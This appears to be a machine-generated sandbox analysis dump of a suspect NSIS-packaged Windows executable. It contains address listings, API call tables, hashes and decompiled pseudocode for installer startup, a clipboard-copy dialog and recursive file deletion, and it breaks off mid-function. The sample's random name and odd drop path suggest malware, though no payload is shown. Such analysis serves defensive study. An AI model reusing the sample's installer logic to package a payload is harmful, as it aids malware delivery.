                                                0x00403a28
                                                0x00403a31
                                                0x00403a4e
                                                0x00403ac6
                                                0x00403ac6
                                                0x00403ace
                                                0x00403ad0
                                                0x00403ad0
                                                0x00403ad6
                                                0x00403ad6
                                                0x00403a65
                                                0x00403a71
                                                0x00403a82
                                                0x00403a89
                                                0x00403a90
                                                0x00403a90
                                                0x00403a98
                                                0x00403aa4
                                                0x00403ab2
                                                0x00403abd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403aa6
                                                0x00403aa6
                                                0x00403aa7
                                                0x00403aa9
                                                0x00403aaa
                                                0x00403aab
                                                0x00403ab0
                                                0x00403abf
                                                0x00403ac1
                                                0x00000000
                                                0x00403ac1
                                                0x00000000
                                                0x00403ab0
                                                0x00403aa4
                                                0x00403a3b
                                                0x00403a42
                                                0x00403a42
                                                0x00403858
                                                0x004038ff
                                                0x004038ff
                                                0x0040390b
                                                0x00000000
                                                0x0040390b
                                                0x00403869
                                                0x00403871
                                                0x004038c3
                                                0x004038c3
                                                0x004038c9
                                                0x004038d0
                                                0x0040391e
                                                0x00403920
                                                0x00403925
                                                0x00403927
                                                0x0040392f
                                                0x0040392f
                                                0x0040393a
                                                0x0040393f
                                                0x00403946
                                                0x0040394c
                                                0x0040394e
                                                0x00403a21
                                                0x00403a21
                                                0x00403a21
                                                0x00000000
                                                0x00403954
                                                0x00403954
                                                0x00403956
                                                0x00403957
                                                0x00403960
                                                0x00403959
                                                0x00403959
                                                0x00403959
                                                0x00403966
                                                0x0040396e
                                                0x00403975
                                                0x0040397d
                                                0x0040397d
                                                0x0040398a
                                                0x00403996
                                                0x004039a0
                                                0x004039a0
                                                0x004039a2
                                                0x004039a9
                                                0x004039b3
                                                0x004039bf
                                                0x004039c5
                                                0x004039cb
                                                0x004039ce
                                                0x004039d8
                                                0x004039de
                                                0x004039e0
                                                0x004039e4
                                                0x004039f5
                                                0x004039fb
                                                0x00403a00
                                                0x00403a02
                                                0x00403a05
                                                0x00403a0b
                                                0x00403a0b
                                                0x00403a02
                                                0x004039e0
                                                0x00403a0e
                                                0x00403a15
                                                0x00403a15
                                                0x00403a15
                                                0x00403a15
                                                0x00403a1c
                                                0x00000000
                                                0x00403a1c
                                                0x0040394e
                                                0x004038d2
                                                0x004038d5
                                                0x004038d9
                                                0x004038de
                                                0x004038e0
                                                0x00000000
                                                0x00000000
                                                0x004038ec
                                                0x004038f7
                                                0x004038fc
                                                0x00000000
                                                0x004038fc
                                                0x0040387a
                                                0x00403892
                                                0x004038a3
                                                0x004038a4
                                                0x004038a8
                                                0x004038aa
                                                0x004038b8
                                                0x004038bf
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004038bf
                                                0x004038c1
                                                0x00000000
                                                0x004038c1
                                                0x004037e4
                                                0x004037f0
                                                0x004037f5
                                                0x004037fa
                                                0x004037fc
                                                0x00000000
                                                0x00000000
                                                0x00403804
                                                0x0040380c
                                                0x0040381d
                                                0x00403825
                                                0x00403827
                                                0x0040382c
                                                0x0040382e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040382e
                                                0x00000000
                                                0x0040378b
                                                0x00403734
                                                0x00403736
                                                0x00000000
                                                0x00000000
                                                0x00403738
                                                0x0040373c
                                                0x00403740
                                                0x00403747
                                                0x00403747
                                                0x00403747
                                                0x00403747
                                                0x00000000
                                                0x00403747
                                                0x00403742
                                                0x00403745
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403745
                                                0x004036de
                                                0x004036e2
                                                0x004036e5
                                                0x004036ec
                                                0x004036ec
                                                0x00000000
                                                0x004036ec
                                                0x004036e7
                                                0x004036ea
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004036ea
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004036b8
                                                0x004036b8
                                                0x004036b9
                                                0x004036ba
                                                0x004036ba
                                                0x00000000
                                                0x004036b8
                                                0x00000000

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008001), ref: 0040351A
                                                • GetVersionExW.KERNEL32(?), ref: 00403543
                                                • GetVersionExW.KERNEL32(0000011C), ref: 0040355A
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
                                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
                                                • OleInitialize.OLE32(00000000), ref: 00403634
                                                • SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
                                                • GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\xKBLVUHoY6.exe" ,00000020,"C:\Users\user\Desktop\xKBLVUHoY6.exe" ,00000000), ref: 004036A0
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
                                                • DeleteFileW.KERNELBASE(1033), ref: 00403839
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403920
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040392F
                                                  • Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040393A
                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\xKBLVUHoY6.exe" ,00000000,?), ref: 00403946
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
                                                • DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\xKBLVUHoY6.exe,00420EC8,00000001), ref: 004039D8
                                                • CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
                                                • OleUninitialize.OLE32(?), ref: 00403A28
                                                • ExitProcess.KERNEL32 ref: 00403A42
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
                                                • ExitWindowsEx.USER32 ref: 00403AB5
                                                • ExitProcess.KERNEL32 ref: 00403AD6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                • String ID: "C:\Users\user\Desktop\xKBLVUHoY6.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless$C:\Users\user\Desktop$C:\Users\user\Desktop\xKBLVUHoY6.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                • API String ID: 3859024572-3631985524
                                                • Opcode ID: 19eda2f042309b10385eac17fda2952eb921897bdf3b203613f4dc307425cfa4
                                                • Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
                                                • Opcode Fuzzy Hash: 19eda2f042309b10385eac17fda2952eb921897bdf3b203613f4dc307425cfa4
                                                • Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 143 4056a8-4056c3 144 405852-405859 143->144 145 4056c9-405790 GetDlgItem * 3 call 404498 call 404df1 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405883-405890 144->147 148 40585b-40587d GetDlgItem CreateThread FindCloseChangeNotification 144->148 167 405792-4057ac SendMessageW * 2 145->167 168 4057ae-4057b1 145->168 150 405892-405898 147->150 151 4058ae-4058b8 147->151 148->147 153 4058d3-4058dc call 4044ca 150->153 154 40589a-4058a9 ShowWindow * 2 call 404498 150->154 155 4058ba-4058c0 151->155 156 40590e-405912 151->156 164 4058e1-4058e5 153->164 154->151 157 4058c2-4058ce call 40443c 155->157 158 4058e8-4058f8 ShowWindow 155->158 156->153 161 405914-40591a 156->161 157->153 165 405908-405909 call 40443c 158->165 166 4058fa-405903 call 405569 158->166 161->153 169 40591c-40592f SendMessageW 161->169 165->156 166->165 167->168 172 4057c1-4057d8 call 404463 168->172 173 4057b3-4057bf SendMessageW 168->173 174 405a31-405a33 169->174 175 405935-405960 CreatePopupMenu call 406544 AppendMenuW 169->175 182 4057da-4057ee ShowWindow 172->182 183 40580e-40582f GetDlgItem SendMessageW 172->183 173->172 174->164 180 405962-405972 GetWindowRect 175->180 181 405975-40598a TrackPopupMenu 175->181 180->181 181->174 184 405990-4059a7 181->184 185 4057f0-4057fb ShowWindow 182->185 186 4057fd 182->186 183->174 187 405835-40584d SendMessageW * 2 183->187 188 4059ac-4059c7 SendMessageW 184->188 189 405803-405809 call 404498 185->189 186->189 187->174 188->188 190 4059c9-4059ec OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 4059ee-405a15 SendMessageW 190->192 192->192 193 405a17-405a2b GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                C-Code - Quality: 95%
                                                			E004056A8(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                				struct HWND__* _v8;
                                                				long _v12;
                                                				struct tagRECT _v28;
                                                				void* _v36;
                                                				signed int _v40;
                                                				int _v44;
                                                				int _v48;
                                                				signed int _v52;
                                                				int _v56;
                                                				void* _v60;
                                                				void* _v68;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				struct HWND__* _t94;
                                                				long _t95;
                                                				int _t100;
                                                				void* _t108;
                                                				intOrPtr _t119;
                                                				void* _t127;
                                                				intOrPtr _t130;
                                                				struct HWND__* _t134;
                                                				int _t156;
                                                				int _t159;
                                                				struct HMENU__* _t164;
                                                				struct HWND__* _t168;
                                                				struct HWND__* _t169;
                                                				int _t171;
                                                				void* _t172;
                                                				short* _t173;
                                                				short* _t175;
                                                				int _t177;
                                                
                                                				_t169 =  *0x429204;
                                                				_t156 = 0;
                                                				_v8 = _t169;
                                                				if(_a8 != 0x110) {
                                                					if(_a8 == 0x405) {
                                                						_t127 = CreateThread(0, 0, E0040563C, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                						FindCloseChangeNotification(_t127); // executed
                                                					}
                                                					if(_a8 != 0x111) {
                                                						L17:
                                                						_t171 = 1;
                                                						if(_a8 != 0x404) {
                                                							L25:
                                                							if(_a8 != 0x7b) {
                                                								goto L20;
                                                							}
                                                							_t94 = _v8;
                                                							if(_a12 != _t94) {
                                                								goto L20;
                                                							}
                                                							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                							_a8 = _t95;
                                                							if(_t95 <= _t156) {
                                                								L36:
                                                								return 0;
                                                							}
                                                							_t164 = CreatePopupMenu();
                                                							AppendMenuW(_t164, _t156, _t171, E00406544(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                							_t100 = _a16;
                                                							_t159 = _a16 >> 0x10;
                                                							if(_a16 == 0xffffffff) {
                                                								GetWindowRect(_v8,  &_v28);
                                                								_t100 = _v28.left;
                                                								_t159 = _v28.top;
                                                							}
                                                							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                								_v60 = _t156;
                                                								_v48 = 0x423708;
                                                								_v44 = 0x1000;
                                                								_a4 = _a8;
                                                								do {
                                                									_a4 = _a4 - 1;
                                                									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                								} while (_a4 != _t156);
                                                								OpenClipboard(_t156);
                                                								EmptyClipboard();
                                                								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                								_a4 = _t108;
                                                								_t172 = GlobalLock(_t108);
                                                								do {
                                                									_v48 = _t172;
                                                									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                									 *_t173 = 0xd;
                                                									_t175 = _t173 + 2;
                                                									 *_t175 = 0xa;
                                                									_t172 = _t175 + 2;
                                                									_t156 = _t156 + 1;
                                                								} while (_t156 < _a8);
                                                								GlobalUnlock(_a4);
                                                								SetClipboardData(0xd, _a4);
                                                								CloseClipboard();
                                                							}
                                                							goto L36;
                                                						}
                                                						if( *0x4291ec == _t156) {
                                                							ShowWindow( *0x42a228, 8); // executed
                                                							if( *0x42a2ac == _t156) {
                                                								_t119 =  *0x4226e0; // 0x51a0ec
                                                								E00405569( *((intOrPtr*)(_t119 + 0x34)), _t156);
                                                							}
                                                							E0040443C(_t171);
                                                							goto L25;
                                                						}
                                                						 *0x421ed8 = 2;
                                                						E0040443C(0x78);
                                                						goto L20;
                                                					} else {
                                                						if(_a12 != 0x403) {
                                                							L20:
                                                							return E004044CA(_a8, _a12, _a16);
                                                						}
                                                						ShowWindow( *0x4291f0, _t156);
                                                						ShowWindow(_t169, 8);
                                                						E00404498(_t169);
                                                						goto L17;
                                                					}
                                                				}
                                                				_v52 = _v52 | 0xffffffff;
                                                				_v40 = _v40 | 0xffffffff;
                                                				_t177 = 2;
                                                				_v60 = _t177;
                                                				_v56 = 0;
                                                				_v48 = 0;
                                                				_v44 = 0;
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t130 =  *0x42a230;
                                                				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                				 *0x4291f0 = GetDlgItem(_a4, 0x403);
                                                				 *0x4291e8 = GetDlgItem(_a4, 0x3ee);
                                                				_t134 = GetDlgItem(_a4, 0x3f8);
                                                				 *0x429204 = _t134;
                                                				_v8 = _t134;
                                                				E00404498( *0x4291f0);
                                                				 *0x4291f4 = E00404DF1(4);
                                                				 *0x42920c = 0;
                                                				GetClientRect(_v8,  &_v28);
                                                				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                				if(_a8 >= 0) {
                                                					SendMessageW(_v8, 0x1001, 0, _a8);
                                                					SendMessageW(_v8, 0x1026, 0, _a8);
                                                				}
                                                				if(_a12 >= _t156) {
                                                					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                				}
                                                				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                				_push(0x1b);
                                                				E00404463(_a4);
                                                				if(( *0x42a238 & 0x00000003) != 0) {
                                                					ShowWindow( *0x4291f0, _t156);
                                                					if(( *0x42a238 & 0x00000002) != 0) {
                                                						 *0x4291f0 = _t156;
                                                					} else {
                                                						ShowWindow(_v8, 8);
                                                					}
                                                					E00404498( *0x4291e8);
                                                				}
                                                				_t168 = GetDlgItem(_a4, 0x3ec);
                                                				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                				if(( *0x42a238 & 0x00000004) != 0) {
                                                					SendMessageW(_t168, 0x409, _t156, _a12);
                                                					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                				}
                                                				goto L36;
                                                			}



































                                                0x004056b0
                                                0x004056b6
                                                0x004056c0
                                                0x004056c3
                                                0x00405859
                                                0x00405876
                                                0x0040587d
                                                0x0040587d
                                                0x00405890
                                                0x004058ae
                                                0x004058b0
                                                0x004058b8
                                                0x0040590e
                                                0x00405912
                                                0x00000000
                                                0x00000000
                                                0x00405914
                                                0x0040591a
                                                0x00000000
                                                0x00000000
                                                0x00405924
                                                0x0040592c
                                                0x0040592f
                                                0x00405a31
                                                0x00000000
                                                0x00405a31
                                                0x0040593e
                                                0x00405949
                                                0x00405952
                                                0x0040595d
                                                0x00405960
                                                0x00405969
                                                0x0040596f
                                                0x00405972
                                                0x00405972
                                                0x0040598a
                                                0x00405993
                                                0x00405996
                                                0x0040599d
                                                0x004059a4
                                                0x004059ac
                                                0x004059ac
                                                0x004059c3
                                                0x004059c3
                                                0x004059ca
                                                0x004059d0
                                                0x004059dc
                                                0x004059e3
                                                0x004059ec
                                                0x004059ee
                                                0x004059f1
                                                0x00405a00
                                                0x00405a03
                                                0x00405a09
                                                0x00405a0a
                                                0x00405a10
                                                0x00405a11
                                                0x00405a12
                                                0x00405a1a
                                                0x00405a25
                                                0x00405a2b
                                                0x00405a2b
                                                0x00000000
                                                0x0040598a
                                                0x004058c0
                                                0x004058f0
                                                0x004058f8
                                                0x004058fa
                                                0x00405903
                                                0x00405903
                                                0x00405909
                                                0x00000000
                                                0x00405909
                                                0x004058c4
                                                0x004058ce
                                                0x00000000
                                                0x00405892
                                                0x00405898
                                                0x004058d3
                                                0x00000000
                                                0x004058dc
                                                0x004058a1
                                                0x004058a6
                                                0x004058a9
                                                0x00000000
                                                0x004058a9
                                                0x00405890
                                                0x004056c9
                                                0x004056cd
                                                0x004056d5
                                                0x004056d9
                                                0x004056dc
                                                0x004056df
                                                0x004056e2
                                                0x004056e5
                                                0x004056e6
                                                0x004056e7
                                                0x00405700
                                                0x00405703
                                                0x0040570d
                                                0x0040571c
                                                0x00405724
                                                0x0040572c
                                                0x00405731
                                                0x00405734
                                                0x00405740
                                                0x00405749
                                                0x00405752
                                                0x00405774
                                                0x0040577a
                                                0x0040578b
                                                0x00405790
                                                0x0040579e
                                                0x004057ac
                                                0x004057ac
                                                0x004057b1
                                                0x004057bf
                                                0x004057bf
                                                0x004057c4
                                                0x004057c7
                                                0x004057cc
                                                0x004057d8
                                                0x004057e1
                                                0x004057ee
                                                0x004057fd
                                                0x004057f0
                                                0x004057f5
                                                0x004057f5
                                                0x00405809
                                                0x00405809
                                                0x0040581d
                                                0x00405826
                                                0x0040582f
                                                0x0040583f
                                                0x0040584b
                                                0x0040584b
                                                0x00000000

                                                APIs
                                                • GetDlgItem.USER32 ref: 00405706
                                                • GetDlgItem.USER32 ref: 00405715
                                                • GetClientRect.USER32(?,?), ref: 00405752
                                                • GetSystemMetrics.USER32 ref: 00405759
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
                                                • ShowWindow.USER32(?,00000008), ref: 004057F5
                                                • GetDlgItem.USER32 ref: 00405816
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
                                                • GetDlgItem.USER32 ref: 00405724
                                                  • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                                • GetDlgItem.USER32 ref: 00405868
                                                • CreateThread.KERNELBASE ref: 00405876
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040587D
                                                • ShowWindow.USER32(00000000), ref: 004058A1
                                                • ShowWindow.USER32(?,00000008), ref: 004058A6
                                                • ShowWindow.USER32(00000008), ref: 004058F0
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
                                                • CreatePopupMenu.USER32 ref: 00405935
                                                • AppendMenuW.USER32 ref: 00405949
                                                • GetWindowRect.USER32 ref: 00405969
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
                                                • OpenClipboard.USER32(00000000), ref: 004059CA
                                                • EmptyClipboard.USER32 ref: 004059D0
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
                                                • GlobalLock.KERNEL32 ref: 004059E6
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
                                                • SetClipboardData.USER32 ref: 00405A25
                                                • CloseClipboard.USER32 ref: 00405A2B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 4154960007-366298937
                                                • Opcode ID: 032864259362101ae99535f7cbe98c4ea316b66d58bd4d2ac02e905e66ea94f0
                                                • Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
                                                • Opcode Fuzzy Hash: 032864259362101ae99535f7cbe98c4ea316b66d58bd4d2ac02e905e66ea94f0
                                                • Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 441 405c13-405c39 call 405ede 444 405c52-405c59 441->444 445 405c3b-405c4d DeleteFileW 441->445 447 405c5b-405c5d 444->447 448 405c6c-405c7c call 406507 444->448 446 405dcf-405dd3 445->446 449 405c63-405c66 447->449 450 405d7d-405d82 447->450 454 405c8b-405c8c call 405e22 448->454 455 405c7e-405c89 lstrcatW 448->455 449->448 449->450 450->446 453 405d84-405d87 450->453 456 405d91-405d99 call 40683d 453->456 457 405d89-405d8f 453->457 458 405c91-405c95 454->458 455->458 456->446 465 405d9b-405daf call 405dd6 call 405bcb 456->465 457->446 461 405ca1-405ca7 lstrcatW 458->461 462 405c97-405c9f 458->462 464 405cac-405cc8 lstrlenW FindFirstFileW 461->464 462->461 462->464 467 405d72-405d76 464->467 468 405cce-405cd6 464->468 481 405db1-405db4 465->481 482 405dc7-405dca call 405569 465->482 467->450 470 405d78 467->470 471 405cf6-405d0a call 406507 468->471 472 405cd8-405ce0 468->472 470->450 483 405d21-405d2c call 405bcb 471->483 484 405d0c-405d14 471->484 473 405ce2-405cea 472->473 474 405d55-405d65 FindNextFileW 472->474 473->471 477 405cec-405cf4 473->477 474->468 480 405d6b-405d6c FindClose 474->480 477->471 477->474 480->467 481->457 485 405db6-405dc5 call 405569 call 4062c7 481->485 482->446 494 405d4d-405d50 call 405569 483->494 495 405d2e-405d31 483->495 484->474 486 405d16-405d1f call 405c13 484->486 485->446 486->474 494->474 498 405d33-405d43 call 405569 call 4062c7 495->498 499 405d45-405d4b 495->499 498->474 499->474
                                                C-Code - Quality: 98%
                                                			E00405C13(void* __eflags, signed int _a4, signed int _a8) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				short _v556;
                                                				short _v558;
                                                				struct _WIN32_FIND_DATAW _v604;
                                                				signed int _t38;
                                                				signed int _t52;
                                                				signed int _t55;
                                                				signed int _t62;
                                                				void* _t64;
                                                				signed char _t65;
                                                				WCHAR* _t66;
                                                				void* _t67;
                                                				WCHAR* _t68;
                                                				void* _t70;
                                                
                                                				_t65 = _a8;
                                                				_t68 = _a4;
                                                				_v8 = _t65 & 0x00000004;
                                                				_t38 = E00405EDE(__eflags, _t68);
                                                				_v12 = _t38;
                                                				if((_t65 & 0x00000008) != 0) {
                                                					_t62 = DeleteFileW(_t68); // executed
                                                					asm("sbb eax, eax");
                                                					_t64 =  ~_t62 + 1;
                                                					 *0x42a2a8 =  *0x42a2a8 + _t64;
                                                					return _t64;
                                                				}
                                                				_a4 = _t65;
                                                				_t8 =  &_a4;
                                                				 *_t8 = _a4 & 0x00000001;
                                                				__eflags =  *_t8;
                                                				if( *_t8 == 0) {
                                                					L5:
                                                					E00406507(0x425710, _t68);
                                                					__eflags = _a4;
                                                					if(_a4 == 0) {
                                                						E00405E22(_t68);
                                                					} else {
                                                						lstrcatW(0x425710, L"\\*.*");
                                                					}
                                                					__eflags =  *_t68;
                                                					if( *_t68 != 0) {
                                                						L10:
                                                						lstrcatW(_t68, 0x40a014);
                                                						L11:
                                                						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                						_t38 = FindFirstFileW(0x425710,  &_v604); // executed
                                                						_t70 = _t38;
                                                						__eflags = _t70 - 0xffffffff;
                                                						if(_t70 == 0xffffffff) {
                                                							L26:
                                                							__eflags = _a4;
                                                							if(_a4 != 0) {
                                                								_t30 = _t66 - 2;
                                                								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                								__eflags =  *_t30;
                                                							}
                                                							goto L28;
                                                						} else {
                                                							goto L12;
                                                						}
                                                						do {
                                                							L12:
                                                							__eflags = _v604.cFileName - 0x2e;
                                                							if(_v604.cFileName != 0x2e) {
                                                								L16:
                                                								E00406507(_t66,  &(_v604.cFileName));
                                                								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                								if(__eflags == 0) {
                                                									_t52 = E00405BCB(__eflags, _t68, _v8);
                                                									__eflags = _t52;
                                                									if(_t52 != 0) {
                                                										E00405569(0xfffffff2, _t68);
                                                									} else {
                                                										__eflags = _v8 - _t52;
                                                										if(_v8 == _t52) {
                                                											 *0x42a2a8 =  *0x42a2a8 + 1;
                                                										} else {
                                                											E00405569(0xfffffff1, _t68);
                                                											E004062C7(_t67, _t68, 0);
                                                										}
                                                									}
                                                								} else {
                                                									__eflags = (_a8 & 0x00000003) - 3;
                                                									if(__eflags == 0) {
                                                										E00405C13(__eflags, _t68, _a8);
                                                									}
                                                								}
                                                								goto L24;
                                                							}
                                                							__eflags = _v558;
                                                							if(_v558 == 0) {
                                                								goto L24;
                                                							}
                                                							__eflags = _v558 - 0x2e;
                                                							if(_v558 != 0x2e) {
                                                								goto L16;
                                                							}
                                                							__eflags = _v556;
                                                							if(_v556 == 0) {
                                                								goto L24;
                                                							}
                                                							goto L16;
                                                							L24:
                                                							_t55 = FindNextFileW(_t70,  &_v604);
                                                							__eflags = _t55;
                                                						} while (_t55 != 0);
                                                						_t38 = FindClose(_t70);
                                                						goto L26;
